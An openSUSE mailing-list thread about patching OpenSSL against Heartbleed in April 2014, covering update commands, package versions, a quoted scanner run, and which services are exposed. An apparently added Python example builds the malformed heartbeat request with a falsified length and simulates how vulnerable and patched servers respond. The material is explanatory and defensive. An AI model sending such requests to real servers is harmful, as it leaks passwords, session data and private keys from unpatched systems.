I ran away to update a virtual server I run.

Remember on all your openSUSE 12.3 AND 13.1 machines:

sudo zypper in -t patch openSUSE-2014-277

Use "sudo rpm -qa | grep ssl" to confirm you have the latest patched version.

This is the package list from the security announcement:

- openSUSE 13.1 (i586 x86_64):
libopenssl-devel-1.0.1e-11.32.1
libopenssl1_0_0-1.0.1e-11.32.1
libopenssl1_0_0-debuginfo-1.0.1e-11.32.1
openssl-1.0.1e-11.32.1
openssl-debuginfo-1.0.1e-11.32.1
openssl-debugsource-1.0.1e-11.32.1

- openSUSE 13.1 (x86_64):
libopenssl-devel-32bit-1.0.1e-11.32.1
libopenssl1_0_0-32bit-1.0.1e-11.32.1
libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1

- openSUSE 13.1 (noarch):
openssl-doc-1.0.1e-11.32.1

- openSUSE 12.3 (i586 x86_64):
libopenssl-devel-1.0.1e-1.44.1
libopenssl1_0_0-1.0.1e-1.44.1
libopenssl1_0_0-debuginfo-1.0.1e-1.44.1
openssl-1.0.1e-1.44.1
openssl-debuginfo-1.0.1e-1.44.1
openssl-debugsource-1.0.1e-1.44.1

- openSUSE 12.3 (x86_64):
libopenssl-devel-32bit-1.0.1e-1.44.1
libopenssl1_0_0-32bit-1.0.1e-1.44.1
libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1

- openSUSE 12.3 (noarch):
openssl-doc-1.0.1e-1.44.1

My questions below:

On Thu, Apr 10, 2014 at 10:39 AM, Christopher Myers <cmyers@mail.millikin.edu> wrote:
Well... I applied the patches mentioned in the email I'd sent a few minutes ago to my 12.2 box, and after doing so, the heartbleed python script no longer flags it:
user@computer:~/Desktop/heartbleed> python ssltest.py my.server
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1286
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable
So, I'm guessing it's ok? No odd issues as of yet.
Is it just HTTPS connections we have to worry about?

I read that SSH is safe because it doesn't use the TLS protocol that is the core of the vulnerability.

For secure FTP, it uses SSH so that should be safe as well.

What about POP / IMAP / SMTP? Do any of those have susceptibility to Heartbleed?

Greg
--
To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org
To contact the owner, e-mail: opensuse+owner@opensuse.org
On 04/10/2014 09:49 AM, Greg Freemyer wrote:
Is it just HTTPS connections we have to worry about?
I read that SSH is safe because it doesn't use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
I've read that it affects anything that uses the OpenSSL libs:

HTTPS
SMTP (submission port 587)
POP (port 995)
IMAP (port 993)
XMPP (chat servers)
SSL VPNs (!!!!)
Various network appliances, including security stacks. (!!!!)
etc, etc, etc.

Apparently each heartbeat packet can return only 64-KB of data, but subsequent ones can return other 64-KB areas. Thus, the hacker could just walk through all RAM and suck whatever's there.

What's there? Usernames, passwords, PKI keys (both public and private!!!), and depending on what you've been doing, your SSH public/private keys.

Since the data exfiltration is completely silent and no connections are logged, you'd never know if you've been hacked!

This one is bad indeed.

Regards,
Lew
On 04/10/14 19:14, Lew Wolfgang wrote:
On 04/10/2014 09:49 AM, Greg Freemyer wrote:
Is it just HTTPS connections we have to worry about?
I read that SSH is safe because it doesn't use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
I've read that it affects anything that uses the openSSL libs:
HTTPS
SMTP (submission port 587)
POP (port 995)
IMAP (port 993)
XMPP (chat servers)
SSL VPNs (!!!!)
Various network appliances, including security stacks. (!!!!)
etc, etc, etc.
Don't forget clients (mostly CLI apps like curl) when they connect to a malicious server.

AFAIK, browsers don't use OpenSSL, so there is no problem.

Joachim

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Joachim Schrod, Roedermark, Germany
Email: jschrod@acm.org
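What Lew describes above (a heartbeat whose 16-bit length field claims up to 64 KB, which an unpatched peer copies out of adjacent memory) and what Christopher's ssltest.py run earlier in the thread checks for (whether a heartbeat reply comes back at all, and whether it carries more than was sent), as one added Python example for this thread. It is not ssltest.py and not OpenSSL code: the two peer behaviours are small simulations of the pre-patch and post-patch bounds check, the bytes in `memory` are a constructed stand-in for whatever sits next to the heartbeat buffer in a real process, and the record layout follows RFC 6520 over TLS 1.1 (version bytes 03 02, as in the quoted output). The client-side case Joachim raises is the same exchange with the roles swapped: a malicious server sends exactly this request to an OpenSSL-linked client such as curl.

```python
# Heartbleed (CVE-2014-0160) as an exchange: the lying heartbeat request, a simulated
# pre-patch and post-patch peer, and the verdict logic a checker such as ssltest.py applies.
# Added example for this thread; it is not ssltest.py or OpenSSL code and touches no network.
import struct

TLS_ALERT, TLS_HANDSHAKE, TLS_HEARTBEAT = 21, 22, 24
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16          # RFC 6520: at least 16 bytes of padding follow the payload
TLS_1_1 = (3, 2)         # the "ver = 0302" in the ssltest.py output quoted above


def tls_record(rtype, version, body):
    """5-byte TLS record header (type, major, minor, length) followed by the body."""
    return struct.pack(">BBBH", rtype, version[0], version[1], len(body)) + body


def build_heartbeat_request(claimed_len=0x4000, payload=b"", version=TLS_1_1):
    """Heartbeat request whose 16-bit payload_length claims more than is actually sent.
    0xFFFF is the most one request can claim, which is where '64 KB per packet' comes from."""
    if not 0 <= claimed_len <= 0xFFFF:
        raise ValueError("payload_length is a 16-bit field")
    body = struct.pack(">BH", HB_REQUEST, claimed_len) + payload + b"\0" * HB_PADDING
    return tls_record(TLS_HEARTBEAT, version, body)


def parse_records(data):
    """Split a TLS byte stream into (type, version, body) tuples; a truncated tail is dropped."""
    records, off = [], 0
    while off + 5 <= len(data):
        rtype, major, minor, length = struct.unpack(">BBBH", data[off:off + 5])
        if off + 5 + length > len(data):
            break
        records.append((rtype, (major, minor), data[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def vulnerable_peer(request, adjacent_memory):
    """Pre-patch behaviour: trust payload_length and copy that many bytes starting at the
    payload, running on into whatever lies next to it. adjacent_memory is a constructed
    stand-in for that neighbouring process memory."""
    _, version, body = parse_records(request)[0]
    _, claimed = struct.unpack(">BH", body[:3])
    copied = (body[3:] + adjacent_memory)[:claimed]
    reply = struct.pack(">BH", HB_RESPONSE, claimed) + copied + b"\0" * HB_PADDING
    return tls_record(TLS_HEARTBEAT, version, reply)


def patched_peer(request, adjacent_memory):
    """Post-patch behaviour: check payload_length against the record and silently discard
    a request that does not fit (RFC 6520), so the other side sees no heartbeat reply."""
    _, version, body = parse_records(request)[0]
    _, claimed = struct.unpack(">BH", body[:3])
    if 3 + claimed + HB_PADDING > len(body):
        return b""
    reply = struct.pack(">BH", HB_RESPONSE, claimed) + body[3:3 + claimed] + b"\0" * HB_PADDING
    return tls_record(TLS_HEARTBEAT, version, reply)


def check_response(response, sent_payload=b""):
    """Verdict in the spirit of ssltest.py. A heartbeat reply carrying more than the echo of
    what we sent (plus padding) means memory leaked; no reply or an alert means the
    malformed request was rejected. Returns (verdict, leaked_bytes)."""
    records = parse_records(response)
    if not records:
        return "not_vulnerable", b""   # EOF / connection closed, as in the run quoted above
    for rtype, _, body in records:
        if rtype == TLS_ALERT:
            return "not_vulnerable", b""
        if rtype == TLS_HEARTBEAT and body[:1] == bytes([HB_RESPONSE]):
            returned = body[3:]
            end = max(len(sent_payload), len(returned) - HB_PADDING)
            extra = returned[len(sent_payload):end]
            return ("vulnerable", extra) if extra else ("not_vulnerable", b"")
    return "unknown", b""


if __name__ == "__main__":
    # Constructed: the kind of bytes that sit next to the heartbeat buffer in a busy server.
    memory = b"Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n-----BEGIN RSA PRIVATE KEY-----"
    probe = build_heartbeat_request()
    for name, peer in (("pre-patch", vulnerable_peer), ("patched", patched_peer)):
        verdict, leaked = check_response(peer(probe, memory))
        print(f"{name}: {verdict}, {len(leaked)} bytes beyond the echo")
```

A well-formed request (`build_heartbeat_request(claimed_len=4, payload=b"ping")`) is echoed by both peers and classified as not vulnerable, which is the point: the bug only shows when the length field lies, so a checker has to send the lie. The verdict relies on what the peer does with that lie, not on the server's banner or OpenSSL version string, which is why a run like the one quoted above is worth more than reading `openssl version`.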
On Thursday, April 10, 2014 12:49:03 PM Greg Freemyer wrote:
I ran away to update a virtual server I run.
Remember on all your openSUSE 12.3 AND 13.1 machines:
sudo zypper in -t patch openSUSE-2014-277
Use "sudo rpm -qa | grep ssl" to confirm you have the latest patched version.
This is the package list from the security announcement:
- openSUSE 13.1 (i586 x86_64):
libopenssl-devel-1.0.1e-11.32.1 libopenssl1_0_0-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-1.0.1e-11.32.1 openssl-1.0.1e-11.32.1 openssl-debuginfo-1.0.1e-11.32.1 openssl-debugsource-1.0.1e-11.32.1
- openSUSE 13.1 (x86_64):
libopenssl-devel-32bit-1.0.1e-11.32.1 libopenssl1_0_0-32bit-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1
- openSUSE 13.1 (noarch):
openssl-doc-1.0.1e-11.32.1
- openSUSE 12.3 (i586 x86_64):
libopenssl-devel-1.0.1e-1.44.1 libopenssl1_0_0-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-1.0.1e-1.44.1 openssl-1.0.1e-1.44.1 openssl-debuginfo-1.0.1e-1.44.1 openssl-debugsource-1.0.1e-1.44.1
- openSUSE 12.3 (x86_64):
libopenssl-devel-32bit-1.0.1e-1.44.1 libopenssl1_0_0-32bit-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1
- openSUSE 12.3 (noarch):
openssl-doc-1.0.1e-1.44.1
My questions below:
On Thu, Apr 10, 2014 at 10:39 AM, Christopher Myers
<cmyers@mail.millikin.edu> wrote:
Well... I applied the patches mentioned in the email I'd sent a few minutes ago to my 12.2 box, and after doing so, the heartbleed python script no longer flags it:
user@computer:~/Desktop/heartbleed> python ssltest.py my.server
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1286
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable
So, I'm guessing it's ok? No odd issues as of yet.
Is it just HTTPS connections we have to worry about?
I read that SSH is safe because it doesn't use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
Greg

Just a comment on your reminder to run:

sudo zypper in -t patch openSUSE-2014-277

I installed from the openSUSE repo today an update to libopenssl. Then I took your suggestion and ran the command to install the patch. I got the following, so I assume the update includes the patch:

----------
x5b8:~> sudo zypper in -t patch openSUSE-2014-277
root's password:
Loading repository data...
Reading installed packages...
'patch:openSUSE-2014-277' is already installed.
Resolving package dependencies...
Nothing to do.

Thanks for posting the options and information. Now I need to check all my secure websites (Bank, etc) to see if they are fixed.

Russ
--
openSUSE 13.1(Linux 3.11.10-7-desktop x86_64| Intel(R) Quad Core(TM) i5-4440 CPU @ 3.10GHz|8GB DDR3| GeForce 8400GS (NVIDIA-Linux-x86_64-331.49)|KDE 4.12.4
participants (4)
- Greg Freemyer
- Joachim Schrod
- Lew Wolfgang
- upscope